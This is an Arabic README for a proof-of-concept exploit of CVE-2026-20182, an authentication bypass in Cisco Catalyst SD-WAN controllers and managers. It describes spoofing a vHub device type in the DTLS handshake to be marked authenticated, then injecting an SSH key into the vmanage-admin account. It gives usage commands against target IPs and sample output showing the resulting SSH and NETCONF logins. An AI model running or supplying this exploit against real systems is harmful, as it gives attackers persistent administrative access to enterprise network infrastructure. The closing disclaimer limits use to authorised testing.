CVE-2026-20182 — تجاوز المصادقة في وحدة تحكم/مدير Cisco Catalyst SD-WAN
استغلال إثبات مفهوم لـ CVE-2026-20182، وهو تجاوز مصادقة حرج (CVSS 10.0) في خدمة vdaemon DTLS (UDP/12346) على وحدة تحكم (vSmart) ومدير (vManage) Cisco Catalyst SD-WAN.
الإفصاح: 14 مايو 2026 بواسطة Rapid7 (Stephen Fewer & Jonah Burgess)
CISA KEV: أضيف في 14 مايو 2026 (توجيه الطوارئ 26-03)
CVSS: 10.0 — CWE-287: مصادقة غير صحيحة
الثغرة
تستخدم خدمة vdaemon مصافحة DTLS متعددة المراحل لمصادقة أقران مستوى التحكم. تقوم وظيفة vbond_proc_challenge_ack() بتنفيذ التحقق من الشهادة الخاص بنوع الجهاز — لكن نوع الجهاز 2 (vHub) لا يحتوي على مسار تحقق. إرسال CHALLENGE_ACK مع device_type=2 يتسبب في تجاوز الوظيفة لكل الشروط الشرطية وتعيين peer->authenticated = 1 بدون شروط.
لا حاجة لبيانات اعتماد صالحة، أو شهادة موقعة من CA، أو معرفة بنشر SD-WAN.
ما يفعله الاستغلال
- إنشاء اتصال DTLS 1.2 بخدمة vdaemon الهدف (UDP/12346)
- استقبال رسالة CHALLENGE (msg_type=8)
- إرسال CHALLENGE_ACK مدعياً أنه vHub (device_type=2) → يتم وضع علامة مصادقة على النظير
- إرسال HELLO (msg_type=5) → ينتقل النظير إلى حالة UP
- حقن مفتاح SSH عام في
/home/vmanage-admin/.ssh/authorized_keys عبر MSG_VMANAGE_TO_PEER (msg_type=14)
- منح وصول NETCONF (SSH TCP/830) أو وصول SSH (TCP/22) كمستخدم
vmanage-admin
الاستخدام
python3 cve-2026-20182.py -t <target> [options]
الخيارات
أمثلة
# إنشاء زوج مفاتيح جديد واستغلال
python3 cve-2026-20182.py -t 192.168.1.100
# استخدام مفتاح عام موجود
python3 cve-2026-20182.py -t 192.168.1.100 --key-file ~/.ssh/id_rsa.pub
# استغلال والتحقق عبر NETCONF
python3 cve-2026-20182.py -t 192.168.1.100 --netconf
المخرجات
[*] استهداف 192.168.1.100:12346 (vdaemon DTLS)
[+] اكتملت مصافحة DTLS (تم استقبال msg_type=8، 1027 بايت)
[*] إرسال CHALLENGE_ACK مع device_type=2 (vHub) ...
[+] peer->authenticated = 1 (تم تجاوز المصادقة!)
[*] إرسال HELLO ...
[+] النظير في حالة UP (تم تجاوز مصافحة الاقتران بنجاح)
[*] حقن مفتاح SSH العام ...
[+] NETCONF: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa -p 830 [email protected]
[+] SSH: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa [email protected]
الإصدارات المتأثرة
المراجع البحثية
التفاصيل التقنية
رأس بروتوكول vdaemon هو 12 بايت:
أنواع الأجهزة: 1=vEdge، 2=vHub، 3=vSmart، 4=vBond، 5=vManage
المتطلبات
- بايثون 3.7+
- واجهة سطر الأوامر
openssl (لنقل DTLS)
- مكتبة
cryptography (pip install cryptography)
إخلاء المسؤولية
يُقصد من هذا الاستغلال استخدامه فقط في عمليات الفريق الأحمر المصرح بها، واختبار الاختراق، والبحث الأمني على الأنظمة التي لديك إذن كتابي صريح لها. الاستخدام غير المصرح به غير قانوني.